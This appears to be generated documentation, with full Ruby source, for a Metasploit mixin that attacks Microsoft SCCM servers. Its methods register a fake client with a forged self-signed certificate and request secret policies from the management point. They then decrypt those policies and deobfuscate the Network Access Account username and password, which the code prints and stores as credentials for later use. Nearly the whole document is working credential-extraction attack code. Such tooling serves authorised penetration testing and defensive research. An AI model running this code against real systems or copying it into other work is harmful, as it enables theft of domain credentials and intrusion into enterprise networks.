Module: Msf::Exploit::Remote::HTTP::SCCM

Includes:
Auxiliary::Report, Msf::Exploit::Remote::HttpClient, Msf::Exploit::Retry
Defined in:
lib/msf/core/exploit/remote/http/sccm.rb

Overview

This module provides a way of interacting with SCCM servers

Constant Summary

KEY_SIZE =
2048
SECRET_POLICY_FLAG =
4

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #sslkeylogfile, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::LoginScanner

#configure_login_scanner

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from Msf::Exploit::Retry

#retry_until_truthy

Instance Method Details

#deobfuscate_policy_value(value) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 290

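# Decrypt an obfuscated policy value (such as the NetworkAccessUsername /
# NetworkAccessPassword values of a CCM_NetworkAccessAccount instance).
#
# Layout read from the hex-decoded blob (byte offsets as used below):
#   4..43   40-byte secret fed to mscrypt_derive_key_sha1 to derive the des-ede3-cbc key
#   52..55  little-endian 32-bit length of the ciphertext
#   64..    ciphertext, 3DES-CBC with an all-zero 8-byte IV
# The remaining header bytes are not interpreted here.
#
# @param value [String] hex-encoded blob; any non-hex characters are dropped first
# @return [String] the decrypted value, transcoded from UTF-16LE to UTF-8
# @raise [ArgumentError] if the blob is shorter than the 64-byte header the fields above need
# @raise [OpenSSL::Cipher::CipherError] if the ciphertext does not decrypt cleanly
def deobfuscate_policy_value(value)
  raw = [value.gsub(/[^0-9A-Fa-f]/, '')].pack('H*')
  # Without a full header the length and key slices below come back nil and the
  # failure would surface as a confusing NoMethodError/TypeError further down.
  raise ArgumentError, "policy value too short (#{raw.bytesize} bytes)" if raw.bytesize < 64

  # 'V' pins the little-endian on-the-wire layout; 'I' would follow the host byte order.
  data_length = raw[52..55].unpack1('V')
  ciphertext = raw[64, data_length]
  key = mscrypt_derive_key_sha1(raw[4..43])

  cipher = OpenSSL::Cipher.new('des-ede3-cbc')
  cipher.decrypt
  cipher.iv = "\x00" * 8
  cipher.key = key
  plaintext = cipher.update(ciphertext) + cipher.final

  plaintext.force_encoding('utf-16le').encode('utf-8')
end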

#generate_key_and_cert(subject) ⇒ Object

Create a private key and self-signed certificate for our computer registration



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 330

# Create a private key and self-signed certificate for our computer registration
#
# @param subject [String] common name used for both the subject and the issuer
# @return [Array(OpenSSL::PKey::RSA, OpenSSL::X509::Certificate)] the KEY_SIZE-bit key and
#   the X.509 v3 certificate it signed (SHA-256)
def generate_key_and_cert(subject)
  one_year = 365 * 24 * 3600
  name = OpenSSL::X509::Name.new([['CN', subject]])

  rsa = OpenSSL::PKey::RSA.new(KEY_SIZE)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2 # X.509 v3, required for the extensions added below
  # 64-bit random serial assembled from two 32-bit halves
  cert.serial = (rand(0xFFFFFFFF) << 32) | rand(0xFFFFFFFF)
  cert.public_key = rsa.public_key
  cert.subject = name
  cert.issuer = name

  # Randomised validity window: not_before lies one to four years in the past and
  # the certificate stays valid for a whole number (four to nine) of years after it.
  backdate = one_year + rand(one_year * 3)
  cert.not_before = Time.at(Time.now.to_i - backdate)
  cert.not_after = Time.at(cert.not_before.to_i + rand(4..9) * one_year)

  factory = OpenSSL::X509::ExtensionFactory.new
  factory.subject_certificate = cert
  factory.issuer_certificate = cert
  cert.extensions = [
    factory.create_extension('keyUsage', 'digitalSignature,dataEncipherment'),
    factory.create_extension('extendedKeyUsage', '1.3.6.1.4.1.311.101.2, 1.3.6.1.4.1.311.101')
  ]
  cert.sign(rsa, OpenSSL::Digest.new('SHA256'))

  [rsa, cert]
end

#get_creds_from_policy_doc(policy) ⇒ Object

Extract obfuscated credentials from the resulting policy XML document



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 269

# Extract obfuscated credentials from the resulting policy XML document
#
# Walks every CCM_NetworkAccessAccount instance, deobfuscates its
# NetworkAccessUsername and NetworkAccessPassword values and strips the trailing
# NUL each one carries.
#
# @param policy [String] the decrypted policy XML
# @return [Array<Array(String, String)>] [username, password] pairs; an instance whose
#   username and password are both blank is skipped
def get_creds_from_policy_doc(policy)
  doc = Nokogiri::XML(policy)
  accounts = doc.xpath(".//instance[@class='CCM_NetworkAccessAccount']")

  accounts.each_with_object([]) do |account, creds|
    username, password = %w[NetworkAccessUsername NetworkAccessPassword].map do |property|
      obfuscated = account.xpath("property[@name='#{property}']/value").text
      deobfuscate_policy_value(obfuscated).delete_suffix("\x00")
    end

    # Deleted credentials seem to result in just an empty value for username and password
    next if username.blank? && password.blank?

    creds << [username, password]
  end
end

#get_naa_credentials(opts, management_point, site_code, computer_user) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 20

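# Register a computer with the management point, fetch every policy flagged as
# secret and report any Network Access Account (NAA) credentials found in them.
#
# @param opts [Hash] base options for the HTTP client; 'rhost', 'rport' and 'headers'
#   are overridden below
# @param management_point [String] hostname of the SCCM management point
# @param site_code [String] SCCM site code the policies are requested from
# @param computer_user [String] computer name used for the registration
# @return [Set<Array(String, String)>] the [username, password] pairs that were reported
#
# Aborts via fail_with when the management point is unreachable (SocketError) or no
# policy assignments were received before the retry timeout.
def get_naa_credentials(opts, management_point, site_code, computer_user)
  key, cert = generate_key_and_cert('ConfigMgr Client')

  # Plain HTTP on port 80; the requests identify themselves as the ConfigMgr client.
  http_opts = opts.merge({
    'rhost' => management_point,
    'rport' => 80,
    'headers' => {
      'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
      'Accept-Encoding' => 'gzip, deflate',
      'Accept' => '*/*'
    }
  })

  sms_id, ip_address = register_request(http_opts, management_point, key, cert, computer_user)
  # get_secret_policies returns nil when the reply carries no policy body (presumably
  # assignments are not available immediately after registration), so poll for a while.
  secret_urls = retry_until_truthy(timeout: 30) do
    get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user)
  end
  # retry_until_truthy is assumed to return nil once the timeout expires; without this
  # guard the failure would surface as a NoMethodError on nil.each below.
  if secret_urls.nil?
    fail_with(Msf::Module::Failure::UnexpectedReply, 'Timed out waiting for policy assignments from the management point')
  end

  all_results = Set.new
  secret_urls.each do |url|
    decrypted_policy = request_policy(http_opts, url, sms_id, key)
    all_results.merge(get_creds_from_policy_doc(decrypted_policy))
  end

  print_status('No NAA credentials configured') if all_results.empty?

  all_results.each do |username, password|
    report_creds(ip_address, username, password)
    print_good("Found valid NAA credentials: #{username}:#{password}")
  end
rescue SocketError => e
  fail_with(Msf::Module::Failure::Unreachable, e.message)
end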

#get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 54

# Ask the management point's MP_PolicyManager endpoint for the policy assignments
# of the registered client and return the locations of those flagged as secret.
#
# The RequestAssignments document is sent as UTF-16LE, zlib-deflated, as the second
# part of a multipart/mixed CCM_POST to /ccm_system/request; the first part is the
# message header carrying our public key plus RSA signatures over the client ID and
# the deflated payload (clientauth hook).
#
# @param http_opts [Hash] base HTTP options; 'headers' must be a Hash, it is merged into
# @param management_point [String] management point hostname, lower-cased as TargetHost
# @param site_code [String] site code used as the PolicySource
# @param key [OpenSSL::PKey::RSA] client private key used for both signatures
# @param cert [OpenSSL::X509::Certificate] client certificate whose public key is encoded into the header
# @param sms_id [String] SMS ID returned by register_request
# @param computer_user [String] computer name; datastore['DOMAIN'] is appended to form the FQDN
# @return [Array<String>, nil] PolicyLocation URLs of the secret policies (possibly empty),
#   or nil when the reply has no second MIME part so that the caller can retry
def get_secret_policies(http_opts, management_point, site_code, key, cert, sms_id, computer_user)
  fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
  hex_pub_key = make_ms_pubkey(cert.public_key)
  guid = SecureRandom.uuid.upcase
  sent_time = Time.now.utc.iso8601
  sccm_host = management_point.downcase
  # NOTE(review): computer_user, site_code and sms_id are interpolated without XML
  # escaping; a value containing '<' or '&' would produce a malformed request.
  request_assignments = "<RequestAssignments SchemaVersion=\"1.00\" ACK=\"false\" RequestType=\"Always\"><Identification><Machine><ClientID>GUID:#{sms_id}</ClientID><FQDN>#{fqdn}</FQDN><NetBIOSName>#{computer_user}</NetBIOSName><SID /></Machine><User /></Identification><PolicySource>SMS:#{site_code}</PolicySource><Resource ResourceType=\"Machine\" /><ServerCookie /></RequestAssignments>\x00"
  request_assignments.encode!('utf-16le')
  # The Length advertised in the header counts the UTF-16LE body only, not the CRLF appended next
  body_length = request_assignments.bytes.length
  request_assignments = request_assignments.bytes.pack('C*') + "\r\n"
  compressed = Rex::Text.zlib_deflate(request_assignments)

  # The payload signature covers the deflated bytes that are actually sent
  payload_signature = rsa_sign(key, compressed)

  # The client ID is signed as NUL-terminated UTF-16LE with the GUID upper-cased and braced
  client_id = "GUID:{#{sms_id.upcase}}\x00"
  client_ids_signature = rsa_sign(key, client_id.encode('utf-16le'))
  header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook2 Name=\"clientauth\"><Property Name=\"AuthSenderMachine\">#{computer_user}</Property><Property Name=\"PublicKey\">#{hex_pub_key}</Property><Property Name=\"ClientIDSignature\">#{client_ids_signature}</Property><Property Name=\"PayloadSignature\">#{payload_signature}</Property><Property Name=\"ClientCapabilities\">NonSSL</Property><Property Name=\"HashAlgorithm\">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{#{guid}}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceID>GUID:#{sms_id}</SourceID><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_PolicyManager</TargetAddress><TargetEndpoint>MP_PolicyManager</TargetEndpoint><TargetHost>#{sccm_host}</TargetHost><Timeout>60000</Timeout></Msg>"

  message = Rex::MIME::Message.new
  message.bound = 'aAbBcCdDv1234567890VxXyYzZ'

  # First part: BOM-prefixed UTF-16LE header; second part: the deflated request (Hook3 zlib-compress)
  message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
  message.add_part(compressed, 'application/octet-stream', 'binary')
  opts = http_opts.merge({
    'uri' => '/ccm_system/request',
    'method' => 'CCM_POST',
    'data' => message.to_s
  })
  opts['headers'] = opts['headers'].merge({
    'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
  })
  http_response = send_request_raw(opts)
  response = Rex::MIME::Message.new(http_response.to_s)

  # No body part (a nil HTTP response becomes "" here and should parse to no parts):
  # return nil so the caller's retry_until_truthy tries again
  return nil unless response.parts[1]&.content
  # The reply body is deflated UTF-16LE XML; transcode to UTF-8 before parsing
  compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
  xml_doc = Nokogiri::XML(compressed_response.encode('utf-8'))
  policies = xml_doc.xpath('//Policy')
  # Keep the policies whose PolicyFlags has the SECRET_POLICY_FLAG bit set; a policy
  # without the attribute is dropped (next yields nil, which select treats as false)
  secret_policies = policies.select do |policy|
    flags = policy.attributes['PolicyFlags']
    next if flags.nil?

    flags.value.to_i & SECRET_POLICY_FLAG == SECRET_POLICY_FLAG
  end

  urls = secret_policies.map do |policy|
    policy.xpath('PolicyLocation/text()').text
  end

  # Secret policies without a location cannot be fetched, so leave them out
  urls = urls.reject(&:blank?)

  urls.each do |url|
    print_status("Found policy containing secrets: #{url}")
  end

  urls
end

#make_ms_pubkey(pub_key) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 260

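# Encode an RSA public key as the hex string placed in the PublicKey property of the
# clientauth hook: an 8-byte header, the "RSA1" magic, the little-endian 32-bit bit
# length and public exponent, then the modulus bytes as produced by pub_key.n.to_s(16).
#
# @param pub_key [OpenSSL::PKey::RSA] public key (only n and e are read)
# @return [String] lower-case hex encoding of the blob
def make_ms_pubkey(pub_key)
  # .b keeps the header binary regardless of the file's source encoding, so appending
  # the packed modulus cannot raise Encoding::CompatibilityError.
  blob = "\x06\x02\x00\x00\x00\xA4\x00\x00RSA1".b
  # 'V' pins little-endian 32-bit fields ('I' would follow the host byte order). The bit
  # length is taken from the key itself instead of assuming it matches KEY_SIZE.
  blob << [pub_key.n.num_bits, pub_key.e.to_i].pack('VV')
  blob << [pub_key.n.to_s(16)].pack('H*')

  blob.unpack1('H*')
end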

#mscrypt_derive_key_sha1(secret) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 305

# Derive a 24-byte key from secret: SHA-1 the secret, XOR the 20-byte digest into
# 64-byte blocks of 0x36 and 0x5C, SHA-1 each block, and return the first digest
# followed by the first four bytes of the second. The result is used as the
# des-ede3-cbc key in deobfuscate_policy_value.
#
# @param secret [String] raw key material
# @return [String] 24 binary bytes
def mscrypt_derive_key_sha1(secret)
  seed = OpenSSL::Digest.new('SHA1').digest(secret).bytes

  # Positions beyond the 20-byte digest keep the bare pad value (x ^ 0 == x)
  padded_block = lambda do |pad|
    Array.new(64) { |i| pad ^ (seed[i] || 0) }.pack('C*')
  end

  inner = OpenSSL::Digest.new('SHA1').digest(padded_block.call(0x36))
  outer = OpenSSL::Digest.new('SHA1').digest(padded_block.call(0x5C))

  inner + outer.byteslice(0, 4)
end

#register_request(http_opts, management_point, key, cert, computer_user) ⇒ Object

Make a request to the SCCM server to register our computer



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 113

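# Make a request to the SCCM server to register our computer
#
# Sends a signed ClientRegistrationRequest (UTF-16LE, zlib-deflated) as the second
# part of a multipart/mixed CCM_POST to /ccm_system_windowsauth/request and reads
# the SMSID assigned to the client out of the inflated reply.
#
# @param http_opts [Hash] base HTTP options; 'headers' must be a Hash, it is merged into
# @param management_point [String] management point hostname, lower-cased as TargetHost
# @param key [OpenSSL::PKey::RSA] private key used to sign the request data
# @param cert [OpenSSL::X509::Certificate] certificate sent as both the Encryption and Signing certificate
# @param computer_user [String] computer name; datastore['DOMAIN'] is appended for the FQ Name
# @return [Array(String, String)] the SMS ID (without its 'GUID:' prefix) and the peer
#   address the reply came from
#
# Aborts via fail_with when there is no response, the reply is not a two-part MIME
# message, or no SMSID is present (including ApprovalStatus -1, i.e. registration
# not approved by the server).
def register_request(http_opts, management_point, key, cert, computer_user)
  # The certificate goes out hex-encoded (upper-case DER) in both certificate slots
  pub_key = cert.to_der.unpack('H*')[0].upcase

  fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
  sent_time = Time.now.utc.iso8601
  # NOTE(review): computer_user and the domain are interpolated without XML escaping
  registration_request_data = "<Data HashAlgorithm=\"1.2.840.113549.1.1.11\" SMSID=\"\" RequestType=\"Registration\" TimeStamp=\"#{sent_time}\"><AgentInformation AgentIdentity=\"CCMSetup.exe\" AgentVersion=\"5.00.8325.0000\" AgentType=\"0\" /><Certificates><Encryption Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Encryption><Signing Encoding=\"HexBinary\" KeyType=\"1\">#{pub_key}</Signing></Certificates><DiscoveryProperties><Property Name=\"Netbios Name\" Value=\"#{computer_user}\" /><Property Name=\"FQ Name\" Value=\"#{fqdn}\" /><Property Name=\"Locale ID\" Value=\"1033\" /><Property Name=\"InternetFlag\" Value=\"0\" /></DiscoveryProperties></Data>"

  # The signature covers the UTF-16LE encoding of the <Data> element only
  signature = rsa_sign(key, registration_request_data.encode('utf-16le'))

  registration_request = "<ClientRegistrationRequest>#{registration_request_data}<Signature><SignatureValue>#{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"

  # Body is the NUL-terminated request as UTF-16LE bytes; the advertised Length
  # excludes the CRLF appended afterwards
  rr_utf16 = registration_request.encode('utf-16le').bytes.pack('C*')
  body_length = rr_utf16.bytesize
  rr_utf16 << "\r\n"

  header = "<Msg ReplyCompression=\"zlib\" SchemaVersion=\"1.1\"><Body Type=\"ByteRange\" Length=\"#{body_length}\" Offset=\"0\" /><CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID><Hooks><Hook3 Name=\"zlib-compress\" /></Hooks><ID>{5DD100CD-DF1D-45F5-BA17-A327F43465F8}</ID><Payload Type=\"inline\" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:#{computer_user}:SccmMessaging</ReplyTo><SentTime>#{sent_time}</SentTime><SourceHost>#{computer_user}</SourceHost><TargetAddress>mp:MP_ClientRegistration</TargetAddress><TargetEndpoint>MP_ClientRegistration</TargetEndpoint><TargetHost>#{management_point.downcase}</TargetHost><Timeout>60000</Timeout></Msg>"

  message = Rex::MIME::Message.new
  message.bound = 'aAbBcCdDv1234567890VxXyYzZ'

  # First part: BOM-prefixed UTF-16LE header; second part: the deflated body (Hook3 zlib-compress)
  message.add_part("\ufeff#{header}".encode('utf-16le').bytes.pack('C*'), 'text/plain; charset=UTF-16', nil)
  message.add_part(Rex::Text.zlib_deflate(rr_utf16), 'application/octet-stream', 'binary')

  opts = http_opts.merge({
    'uri' => '/ccm_system_windowsauth/request',
    'method' => 'CCM_POST',
    'data' => message.to_s
  })
  opts['headers'] = opts['headers'].merge({
    'Content-Type' => 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'
  })
  http_response = send_request_raw(opts)
  if http_response.nil?
    fail_with(Msf::Module::Failure::Unreachable, 'No response from server')
  end
  ip_address = http_response.peerinfo['addr']
  response = Rex::MIME::Message.new(http_response.to_s)
  # A usable reply has a header part and a deflated body part. Anything else (typically
  # an HTML error page) is reported with the page title when there is one. Requiring two
  # parts also covers a one-part reply, which would otherwise fail below with a
  # NoMethodError on parts[1].
  if response.parts.length < 2
    html_doc = Nokogiri::HTML(http_response.to_s)
    error = html_doc.xpath('//title').text
    if error.blank?
      error = 'Bad response from server'
      dlog('Response from server:')
      dlog(http_response.to_s)
    end
    fail_with(Msf::Module::Failure::UnexpectedReply, error)
  end

  # Only the second part carries the registration reply: deflated UTF-16LE XML
  compressed_response = Rex::Text.zlib_inflate(response.parts[1].content).force_encoding('utf-16le')
  xml_doc = Nokogiri::XML(compressed_response.encode('utf-8')) # It's crazy, but XML parsing doesn't work with UTF-16-encoded strings
  sms_id = xml_doc.root&.attributes&.[]('SMSID')&.value&.delete_prefix('GUID:')
  if sms_id.nil?
    # ApprovalStatus -1 is reported as the server not approving the registration
    approval = xml_doc.root&.attributes&.[]('ApprovalStatus')&.value
    if approval == '-1'
      fail_with(Msf::Module::Failure::UnexpectedReply, 'Client registration not approved by SCCM server')
    end
    fail_with(Msf::Module::Failure::UnexpectedReply, 'Did not retrieve SMS ID')
  end
  print_status("Got SMS ID: #{sms_id}")

  [sms_id, ip_address]
end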

#report_creds(ip_address, user, password) ⇒ Object



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 353

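# Record a Network Access Account credential against the SCCM service and create an
# UNTRIED login for it.
#
# @param ip_address [String] address the management point answered from
# @param user [String] account name, either 'DOMAIN\user' or a bare user name
# @param password [String] clear-text password
# @return the login record created by create_credential_login
def report_creds(ip_address, user, password)
  # NOTE(review): rport is the module's configured port, whereas the requests in this
  # mixin go to port 80; confirm the two agree for the target being reported.
  service_data = {
    address: ip_address,
    port: rport,
    protocol: 'tcp',
    service_name: 'sccm',
    workspace_id: myworkspace_id
  }

  # 'DOMAIN\user' splits into a realm and a user name; a name without a backslash is
  # the user name on its own, not a domain with no user.
  if user.include?('\\')
    domain, username = user.split('\\', 2)
  else
    domain = nil
    username = user
  end

  credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: username,
    private_data: password,
    private_type: :password
  }
  # Only attach an Active Directory realm when a domain was actually given
  if domain && !domain.empty?
    credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
    credential_data[:realm_value] = domain
  end
  credential_core = create_credential(credential_data.merge(service_data))

  login_data = {
    core: credential_core,
    status: Metasploit::Model::Login::Status::UNTRIED
  }

  create_credential_login(login_data.merge(service_data))
end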

#request_policy(http_opts, policy_url, sms_id, key) ⇒ Object

Request the policy from the policy_url



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 179

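# Request the policy from the policy_url
#
# Fetches the policy with a signed ClientToken header, then unwraps the CMS
# EnvelopedData it comes back as: the content-encryption key is RSA-decrypted with
# our private key (PKCS#1 v1.5 or OAEP, depending on the key-encryption algorithm)
# and the body is decrypted with AES-256-CBC or 3DES-CBC.
#
# @param http_opts [Hash] base HTTP options; 'headers' must be a Hash, it is merged into
# @param policy_url [String] PolicyLocation as returned by get_secret_policies; a leading
#   'http(s)://<mp>' placeholder is stripped and braces are percent-encoded. The caller's
#   string is not modified.
# @param sms_id [String] SMS ID of the registered client
# @param key [OpenSSL::PKey::RSA] client private key matching the registered certificate
# @return [String] the decrypted policy document as UTF-8 with its trailing NUL removed
#
# Aborts via fail_with when there is no response, the envelope has no recipient or no
# KeyTransRecipientInfo, an unsupported key- or content-encryption algorithm is used,
# or the unwrapped key / IV has the wrong length.
def request_policy(http_opts, policy_url, sms_id, key)
  # \A anchors at the start of the string (^ would also match after a newline) and sub
  # returns a new string instead of mutating the caller's argument
  policy_url = policy_url.sub(%r{\Ahttps?://<mp>}, '')
  policy_url = policy_url.gsub('{', '%7B').gsub('}', '%7D')

  now = Time.now.utc.iso8601
  client_token = "GUID:#{sms_id};#{now};2"
  # The token is signed as NUL-terminated UTF-16LE bytes
  client_signature = rsa_sign(key, (client_token + "\x00").encode('utf-16le').bytes.pack('C*'))

  opts = http_opts.merge({
    'uri' => policy_url,
    'method' => 'GET'
  })
  opts['headers'] = opts['headers'].merge({
    'ClientToken' => client_token,
    'ClientTokenSignature' => client_signature
  })

  http_response = send_request_raw(opts)
  # A missing response is a reachability problem; fail cleanly rather than with a
  # NoMethodError on gzip_decode!
  if http_response.nil?
    fail_with(Msf::Module::Failure::Unreachable, 'No response from server')
  end
  http_response.gzip_decode!

  ci = Rex::Proto::CryptoAsn1::Cms::ContentInfo.parse(http_response.body)
  cms_envelope = ci.enveloped_data

  ri = cms_envelope[:recipient_infos]
  if ri.value.empty?
    fail_with(Msf::Module::Failure::UnexpectedReply, 'No recipient infos provided')
  end

  if ri[0][:ktri].nil?
    fail_with(Msf::Module::Failure::UnexpectedReply, 'KeyTransRecipientInfo not found')
  end

  body = cms_envelope[:encrypted_content_info][:encrypted_content].value

  # Unwrap the content-encryption key with our private key; the padding follows the
  # key-encryption algorithm the server chose
  key_encryption_alg = ri[0][:ktri][:key_encryption_algorithm][:algorithm].value
  encrypted_rsa_key = ri[0][:ktri][:encrypted_key].value
  if key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSA_ENCRYPTION.value
    decrypted_key = key.private_decrypt(encrypted_rsa_key)
  elsif key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP.value
    decrypted_key = key.private_decrypt(encrypted_rsa_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
  else
    fail_with(Msf::Module::Failure::UnexpectedReply, "Key encryption routine is currently unsupported: #{key_encryption_alg}")
  end

  cea = cms_envelope[:encrypted_content_info][:content_encryption_algorithm]
  # Supported content ciphers, with the key and IV sizes the envelope must match
  algorithms = {
    Rex::Proto::CryptoAsn1::OIDs::OID_AES256_CBC.value => { iv_length: 16, key_length: 32, cipher_name: 'aes-256-cbc' },
    Rex::Proto::CryptoAsn1::OIDs::OID_DES_EDE3_CBC.value => { iv_length: 8, key_length: 24, cipher_name: 'des-ede3-cbc' }
  }
  if algorithms.include?(cea[:algorithm].value)
    alg_hash = algorithms[cea[:algorithm].value]
    if decrypted_key.length != alg_hash[:key_length]
      fail_with(Msf::Module::Failure::UnexpectedReply, "Bad key length: #{decrypted_key.length}")
    end
    # The IV is the OCTET STRING carried in the algorithm parameters
    iv = RASN1::Types::OctetString.new
    iv.parse!(cea[:parameters].value)
    if iv.value.length != alg_hash[:iv_length]
      # Report the length that was checked (the parsed value, not the ASN.1 object)
      fail_with(Msf::Module::Failure::UnexpectedReply, "Bad IV length: #{iv.value.length}")
    end
    cipher = OpenSSL::Cipher.new(alg_hash[:cipher_name])
    cipher.decrypt
    cipher.key = decrypted_key
    cipher.iv = iv.value

    decrypted = cipher.update(body) + cipher.final
  else
    fail_with(Msf::Module::Failure::UnexpectedReply, "Decryption routine is currently unsupported: #{cea[:algorithm].value}")
  end

  # The policy is UTF-16LE text with a trailing NUL
  decrypted.force_encoding('utf-16le').encode('utf-8').delete_suffix("\x00")
end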

#rsa_sign(key, data) ⇒ Object

Sign the data with the RSA key and reverse the signature bytes (strange, but it's what's required)



# File 'lib/msf/core/exploit/remote/http/sccm.rb', line 252

# Sign the data using the RSA key, and reverse it (strange, but it's what's required)
#
# @param key [OpenSSL::PKey::RSA] signing key
# @param data [String] bytes to sign (SHA-256; OpenSSL's default RSA signature padding)
# @return [String] upper-case hex encoding of the byte-reversed signature
def rsa_sign(key, data)
  reversed = key.sign(OpenSSL::Digest.new('SHA256'), data).reverse
  reversed.unpack1('H*').upcase
end